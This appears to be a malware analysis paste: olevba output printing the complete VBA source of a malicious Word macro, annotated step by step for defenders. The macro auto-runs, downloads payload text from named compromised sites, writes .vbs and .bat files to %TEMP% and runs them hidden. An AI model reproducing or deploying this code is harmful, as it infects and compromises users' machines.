dynamoo

Malicious Word macro

Sep 16th, 2015
  1. olevba 0.31 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MAS-HB-V report~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: report~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: report~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub Auto_Open()
      ' Excel-style auto-exec entry point (olevba lists it as AutoExec below).
      ' Does nothing itself; every entry point in this module funnels into Kuricknms.
  17.     Kuricknms
  18. End Sub
  19. Sub Kuricknms()
      ' Single hop between the three auto-exec handlers and the real routine, Subkaka.
      ' QJKHWDJKASD is assigned and never read anywhere in the listing: filler text.
  20.     QJKHWDJKASD = "qjwhekj 12 gejhhkasjdh kg12hjdg ahjsgd"
  21.     Subkaka
  22. End Sub
  23. Sub AutoOpen()
      ' Word auto-exec entry point (fires when the .doc is opened with macros enabled);
      ' this is the handler that matters for a ThisDocument module. Forwards to Kuricknms.
  24.     Kuricknms
  25. End Sub
  26. Sub Subkaka()
      ' Main dropper routine, reached from AutoOpen / Auto_Open / Workbook_Open via Kuricknms.
      ' Flow as written below: build "http://" from character codes, GET two .txt files from a
      ' web server, substitute three placeholder words in the first one, split it at a "$$"
      ' marker, write the two halves to %TEMP%\<random>.vbs and %TEMP%\<random>.bat, run the
      ' .bat with a hidden window (Module2.Fuflmdjoo), then strip the lure text from the
      ' document (Module1.Hameleon). There is no On Error handler, so any failed step stops here.
      ' Telemetry a defender can key on from this code alone: Office writing .vbs/.bat files in
      ' %TEMP%, Office launching the .bat, and an outbound GET for *.txt made by the Office process.
      ' Undeclared names (PH2, ART, BFT, ATTH, BHJD, NJKQWD, NFBH, CPLRP*, CONT2, HQUJD, QUHDQ)
      ' are implicit Variants.
  27.    
  28.     Dim NJKAWD As String, OOODJWD As String, SSPCKDSD As String
  29.     Dim TSTS As String, CDDD As String, LNSS As String, STT1 As String, STT2 As String
  30.     Dim PBIn As String, KnsdD As Date, CONT As String
  31.     Dim Ndjs As Integer
  32.     Dim ABTH As String, BBTH As String
  33.     Dim klmn As Integer, TTKK As String    ' local klmn shadows Module2.klmn inside this Sub
  34.    
  35.     Dim GEFORCE1 As String, GEFORCE2 As String, hdjshd As Integer
  36.    
  37.     KnsdD = #2/12/2010#    ' only the year is used: Year = 2010, so Ndjs = 104 below
  38.    
  39.     SSPCKDSD = spb(90 + 0 + 2)    ' Chr(92) = "\"
  40.     NJKAWD = Samsung(9898)    ' random numeric string; becomes the dropped file name stem
  41.     OOODJWD = "Temp"
  42.     PH2 = Module1.Jkjdnda(OOODJWD) + SSPCKDSD    ' Environ("Temp") & "\"
  43.      
  44.     ART = 315    ' file numbers for the Open # / Print # / Close # statements below
  45.     BFT = 316
  46.    
  47.     Randomize
  48.     Ndjs = Int(Year(KnsdD)) - 1906    ' 2010 - 1906 = 104
  49.     ATTH = hhr(Ndjs) + Chr(Ndjs + 12) + Chr(Ndjs + 12) + spb(8 + Ndjs)    ' Chr(104,116,116,112) = "http"
  50.     ATTH = ATTH + "://"    ' "http://"
  51.  
  52.     TSTS = ".tx" + "t"    ' ".txt"
  53.     CDDD = "66836487162" + TSTS    ' first-stage file name "66836487162.txt"
  54.     LNSS = "sasa" + TSTS    ' second file name "sasa.txt"
  55.     STT1 = "site/"    ' overwritten on the next line
  56.     STT1 = "thebackpack.fr/w" + "p-content/themes/salient/wpbakery/js_composer/assets/lib/prettyphoto/images/prettyPhoto/light_rounded/"    ' host + path inside a WordPress theme directory
  57.     STT2 = "obiectivhouse.ro/w" + "p-content/plugins/maintenance/load/images/fonts-icon/"    ' second host; assigned but never read (see the fallback branch)
  58.     PBIn = ATTH + STT1 + CDDD    ' http://thebackpack.fr/<STT1 path>/66836487162.txt
  59.    
  60.     CONT = Module2.Huqwhdkjqwl(PBIn)    ' HTTP GET; returns the response text
  61.     BHJD = Right(CONT, 15)
  62.    
  63.     hdjshd = InStr(1, BHJD, "exit")    ' sanity check: a good download ends with "exit" in its last 15 chars
  64.     If (hdjshd = 0) Then
      ' Fallback path. NJKQWD is the empty string, so the retry URLs are just
      ' "http://66836487162.txt" and "http://sasa.txt". STT2 is built above and never used,
      ' so this branch presumably meant to use the second host; as written it cannot succeed.
  65.     NJKQWD = ""
  66.     PBIn = ATTH + NJKQWD + CDDD
  67.     CONT = Module2.Huqwhdkjqwl(PBIn)
  68.     NFBH = Module2.Huqwhdkjqwl(ATTH + NJKQWD + LNSS)
  69.     Else
  70.     NFBH = Module2.Huqwhdkjqwl(ATTH + STT1 + LNSS)    ' second file from the same host/path
  71.     End If
  72.    
  73.     Module2.Crispy (1)    ' ~1 second pause (busy-wait, see Module2.Crispy)
  74.    
      ' Placeholder words in the downloaded text and what replaces them:
      '   "pioneer"   -> PH2    (%TEMP%\)
      '   "paytina"   -> NFBH   (contents of the second download)
      '   "cranberry" -> NJKAWD (the random file name stem)
  75.     CPLRP1 = "pioneer"
  76.     CPLRP2 = "paytina"
  77.     CPLRP3 = "cr" & "anberry"
  78.    
  79.     CONT = Replace(CONT, CPLRP1, PH2, 1)
  80.     CONT = Replace(CONT, CPLRP2, NFBH, 1)
  81.     CONT2 = Replace(CONT, CPLRP3, NJKAWD, 1)
  82.    
  83.     TTKK = "$"
  84.    
  85.     klmn = CInt(Len(CONT2))
      ' Split CONT2 at a "$$" marker: GEFORCE1 = text before it, GEFORCE2 = text after it.
      ' There is no Exit For, so if "$$" occurs more than once the last occurrence wins.
      ' Mid(CONT2, i - 1, 1) with i = 1 (text starting with "$") would raise a runtime error.
  86.     For i = 1 To klmn
  87.         If (Mid(CONT2, i, 1) = TTKK) Then
  88.             If (Mid(CONT2, i - 1, 1) = TTKK) Then
  89.                 GEFORCE1 = Mid(CONT2, 1, i - 2)
  90.                 GEFORCE2 = Mid(CONT2, i + 1, klmn - i)
  91.             End If
  92.         End If
  93.     Next i
  94.    
  95.     HQUJD = ".v"
  96.     ABTH = PH2 + NJKAWD & HQUJD + "bs"    ' %TEMP%\<random>.vbs
  97.     BBTH = PH2 + NJKAWD + ".bat"    ' %TEMP%\<random>.bat
  98.    
  99.    
      ' First half of the download -> the .vbs file (Print # appends a line break).
  100.     Open ABTH For Output As #ART
  101.     Print #ART, GEFORCE1
  102.     Close #ART
  103.    
  104.     Module2.Crispy (1)
  105.      
      ' Second half -> the .bat file; this is the file that gets executed.
  106.     Open BBTH For Output As #BFT
  107.     Print #BFT, GEFORCE2
  108.     Close #BFT
  109.    
  110.     Module2.Crispy (1)
  111.    
  112.     QUHDQ = Module2.Fuflmdjoo(BBTH)    ' Shell(BBTH, 0): run the .bat with a hidden window
  113.     Module1.Hameleon    ' then remove the lure text from the open document
  114.    
  115. End Sub
  116. Sub Workbook_Open()
      ' Excel workbook auto-exec handler; third entry point into the same chain.
      ' JHQDJBASND is assigned and never read: filler.
  117.     JHQDJBASND = "asdbj ashdksajhdjksa"
  118.     Kuricknms
  119. End Sub
  120. Public Function NHdjhasbdhas(a As Object)
      ' Returns a.responseText. Exists only to keep the property name out of Module2;
      ' Module2.Huqwhdkjqwl calls it with the XMLHTTP object after Send.
  121. NHdjhasbdhas = (a.responsetext)
  122. End Function
  123. Public Function Samsung(a As Integer)
      ' Pseudo-random integer in [a, a + a/2) returned as a string (Rnd is in [0, 1)).
      ' Subkaka calls Samsung(9898) and uses the result as the dropped file name stem.
  124. Randomize
  125. Samsung = CStr(Int((a / 2 * Rnd) + a))
  126. End Function
  127. Public Function Creasqwdqwjdk(a As String)
      ' CreateObject wrapper. Not referenced anywhere in this listing
      ' (Module2.Huqwhdkjqwl calls CreateObject directly).
  128. Creasqwdqwjdk = CreateObject(a)
  129. End Function
  130. Public Function spb(sps As Integer)
      ' Chr wrapper, one of three identical ones (spb here, klmn and hhr in Module2),
      ' used to assemble strings such as "\" and "http" one character code at a time.
  131. spb = Chr(sps)
  132. End Function
  133. Public Function Stkjrhbs(a As Integer)
      ' Sgn wrapper. Not referenced anywhere in this listing: dead code / padding.
  134. Stkjrhbs = Sgn(a)
  135. End Function
  136.  
  137.  
  138.  
  139.  
  140. -------------------------------------------------------------------------------
  141. VBA MACRO Module1.bas
  142. in file: report~1.doc - OLE stream: u'Macros/VBA/Module1'
  143. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  144.  
  145. Sub Hameleon()
      ' Post-launch cleanup of the lure. Walks the document characters until it finds a "k"
      ' immediately preceded by a "t", deletes everything from the start of the document up to
      ' that position, and sets the font colour of the remaining text to black. That is consistent
      ' with a decoy layout where the real text is present but hidden behind an "enable content"
      ' banner; the layout itself is not visible from the macro, so treat that as an assumption.
      ' Note this runs only after Module2.Fuflmdjoo has already started the .bat.
  146. Dim ij As Integer
  147. Dim charCount As Integer
  148. charCount = ActiveDocument.Characters.Count - 1
  149. QJKDD = "k"    ' marker character
  150. QJHWDSAD = "qwdhjqwk dhkjd d"    ' filler, never read
  151. JFQW = "t"    ' must precede the marker: the pair is "tk"
  152. ij = 0
  153. Do While True
  154.     ij = ij + 1
  155.     If (ActiveDocument.Characters(ij) = QJKDD) Then
  156.         MBASNMDBW = "qwmdh njh1jaskjhdk h1klh adjks"    ' filler, never read
  157.         If (ActiveDocument.Characters(ij - 1) = JFQW) Then
  158.             ActiveDocument.Range(Start:=0, End:=ij).Delete    ' drop everything through the marker
  159.             ActiveDocument.Range(Start:=0, End:=charCount - ij - 1).Font.ColorIndex = wdBlack    ' make the rest readable
  160.             Exit Do
  161.         End If
  162.     End If
  163.     If (ij = charCount) Then    ' no marker found: leave the document untouched
  164.         Exit Do
  165.     End If
  166. Loop
  167. End Sub
  168.  
  169. Public Function Jkjdnda(sps As String)
      ' Environ wrapper. ThisDocument.Subkaka calls it with "Temp" to obtain the %TEMP% path
      ' where the .vbs and .bat are written. JKQHWDS is assigned and never read.
  170. JKQHWDS = "wq,mnd,mn1djlkasjd kljddk12jdkl j"
  171. Jkjdnda = Environ(sps)
  172. End Function
  173.  
  174.  
  175.  
  176.  
  177. -------------------------------------------------------------------------------
  178. VBA MACRO Module2.bas
  179. in file: report~1.doc - OLE stream: u'Macros/VBA/Module2'
  180. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  181.  
  182. Public Function Kakarumba(n As Integer)
      ' Not referenced anywhere in this listing: dead code. As written it would append n
      ' characters to the (Variant) return value, but hduw is an Integer, so Rnd is rounded to
      ' 0 or 1 on assignment and the only possible characters are Chr(97) and Chr(218).
      ' XQKLJDHJQ is filler.
  183. Dim i As Integer
  184. Dim hduw As Integer
  185. For i = 1 To n Step 1
  186.     Randomize
  187.     hduw = Rnd    ' Single -> Integer: rounds to 0 or 1
  188.     Kakarumba = Kakarumba + hhr(Int(121 * hduw) + 90 + 7)
  189. Next i
  190. XQKLJDHJQ = "qwdkh2 k1hdlkjk21 dhjgasd"
  191. End Function
  192. Public Function Fuflmdjoo(a As String)
      ' Runs `a` with Shell and window style 0 (vbHide), i.e. no visible window.
      ' ThisDocument.Subkaka calls it with the dropped .bat path. The task id returned by Shell
      ' is stored in bydd and discarded; the function's own return value is never set.
      ' BJQHBDADS is filler.
  193. Dim bydd As Variant
  194. bydd = Shell(a, 0)
  195. BJQHBDADS = "asdhjk qdhjqkwhdk qwhdlkj dkhasd"
  196. End Function
  197. Public Function Huqwhdkjqwl(nbqjbdjqw As String)
      ' HTTP GET helper: fetches nbqjbdjqw and returns the response body as text.
      ' The ProgID "MSXML2.ServerXMLHTTP" and the verb "GET" are assembled from Chr() codes and
      ' date arithmetic so neither literal appears in the source (the values are worked out in
      ' the comments below). No On Error handler: a failed CreateObject/Open/Send raises a
      ' runtime error that aborts the caller.
  198. Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, NNNMMHWDKJHAJSdsajgdh As Object, BHJQGWD As String
  199. Dim jahsghjJkhsd As String, dddc As Integer, QYDGGJASSSS As String, AsaHuhqdjhasd As String, hqudhhajs As String, AAHQJD As String
  200. AsaHuhqdjhasd = nbqjbdjqw    ' the URL, copied through two more names before use
  201. JKAHJKSD = AsaHuhqdjhasd
  202. jahsghjJkhsd = AsaHuhqdjhasd
  203. 'asdhjsak dgashjdg as
  204. JQHWD = Chr(Round(4.55, 1) + 0.4 + 72)    ' Chr(77) = "M"
  205. HQUD = JQHWD + "L2.S"    ' "ML2.S"
  206. Dim hquwd As Date, ajsid As Integer
  207. hquwd = #5/10/2011#    ' a # date literal is always m/d/y: 10 May 2011
  208. ajsid = Int(Month(hquwd))    ' 5
  209. Randomize
      ' "6/3/06" below is a *string*, so its conversion to a date follows the system date format.
      ' Where it reads as 6 March 2006, one month later is April (4) and 68 + 4 = 72 -> "H".
      ' On a month-first (e.g. en-US) locale it reads as 3 June, giving July (7) -> Chr(75) = "K",
      ' the ProgID becomes "MSXML2.ServerXMLKTTP" and CreateObject fails. Whether that is a
      ' deliberate locale gate or a bug cannot be determined from the code alone.
  210. BHJQWD = klmn(68 + Int(Month(DateAdd("m", 1, "6/3/06"))))
  211. dddc = 4 - ajsid    ' -1
  212. HQDUQ = hhr(Val(81 + dddc))    ' Chr(80) = "P"
  213. hqudhhajs = klmn(Val(78 + dddc))    ' Chr(77) = "M"
  214. BHQDHJWQDW = HQUD + "erver" + "XML" + BHJQWD    ' "ML2.ServerXMLH"
  215. BYGDWHQGWHDWQ = BHQDHJWQDW + "TT" + HQDUQ    ' "ML2.ServerXMLHTTP"
  216. 'akjshdj ashdk sd
  217. 'asdhkajks dhajsgd
  218. QYDGGJASSSS = "E"
  219. NNNHDQYUWG = hhr(11 * 2 * 4 + 4 * dddc)    ' Chr(88 - 4) = Chr(84) = "T"
  220. QYDGGJASSSS = hhr(71) + QYDGGJASSSS & NNNHDQYUWG    ' "G" + "E" & "T" = "GET"
  221. DWQJDIQWDKWQJDHBB = hqudhhajs + "SX" + BYGDWHQGWHDWQ    ' "MSXML2.ServerXMLHTTP"
  222. 'asdhgajs gdhajsg dsa
  223.  
  224. 'asdhgajs gdhajsg dsa
  225. Set NNNMMHWDKJHAJSdsajgdh = CreateObject(DWQJDIQWDKWQJDHBB)
  226. 'anbdqmnbdqw bdnmq dqw
  227. NNNMMHWDKJHAJSdsajgdh.Open QYDGGJASSSS, jahsghjJkhsd    ' GET <url>
  228. NNNMMHWDKJHAJSdsajgdh.Send (BHJQGWD)    ' BHJQGWD is declared but never assigned: empty body
  229. AAHQJD = ThisDocument.NHdjhasbdhas(NNNMMHWDKJHAJSdsajgdh)    ' .responseText via the wrapper in ThisDocument
  230. Huqwhdkjqwl = AAHQJD
  231.  
  232. End Function
  233. Sub Crispy(NSee As Long)
      ' Busy-wait for NSee seconds (Timer = seconds since midnight), calling DoEvents so the host
      ' application keeps processing messages. ThisDocument.Subkaka calls Crispy(1) between the
      ' download, file-write and execute steps. Because Timer resets to 0 at midnight, a wait that
      ' starts in the last NSee seconds of the day would never reach its deadline. QJKHWD is filler.
  234. Dim NnSke As Long
  235. NnSke = Timer + NSee
  236. Do While Timer < NnSke
  237. DoEvents
  238. Loop
  239. QJKHWD = "asdjhjk qhdjq kwdh hd "
  240. End Sub
  241.  
  242.  
  243. Public Function klmn(pag As Integer)
      ' Chr wrapper (same as hhr below and ThisDocument.spb). Note ThisDocument.Subkaka also
      ' declares a local Integer named klmn, which shadows this function inside that Sub.
  244. klmn = Chr(pag)
  245. End Function
  246.  
  247. Public Function hhr(sps As Integer)
      ' Chr wrapper used for building "http", "GET" and the ProgID one character at a time;
      ' the repeated wrappers exist only to spread Chr() calls across modules.
  248. hhr = Chr(sps)
  249. End Function
  250.  
  251.  
  252.  
  253. +------------+----------------------+-----------------------------------------+
  254. | Type       | Keyword              | Description                             |
  255. +------------+----------------------+-----------------------------------------+
  256. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  257. | AutoExec   | Auto_Open            | Runs when the Excel Workbook is opened  |
  258. | AutoExec   | Workbook_Open        | Runs when the Excel Workbook is opened  |
  259. | Suspicious | Open                 | May open a file                         |
  260. | Suspicious | Shell                | May run an executable file or a system  |
  261. |            |                      | command                                 |
  262. | Suspicious | CreateObject         | May create an OLE object                |
  263. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  264. |            |                      | strings                                 |
  265. | Suspicious | Environ              | May read system environment variables   |
  266. | Suspicious | Output               | May write to a file (if combined with   |
  267. |            |                      | Open)                                   |
  268. | Suspicious | Print #              | May write to a file (if combined with   |
  269. |            |                      | Open)                                   |
  270. | Suspicious | Lib                  | May run code from a DLL                 |
  271. | Suspicious | Lib                  | May run code from a DLL (obfuscation:   |
  272. |            |                      | VBA expression)                         |
  273. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  274. |            |                      | be used to obfuscate strings (option    |
  275. |            |                      | --decode to see all)                    |
  276. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  277. |            |                      | may be used to obfuscate strings        |
  278. |            |                      | (option --decode to see all)            |
  279. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  280. |            | Strings              | may be used to obfuscate strings        |
  281. |            |                      | (option --decode to see all)            |
  282. +------------+----------------------+-----------------------------------------+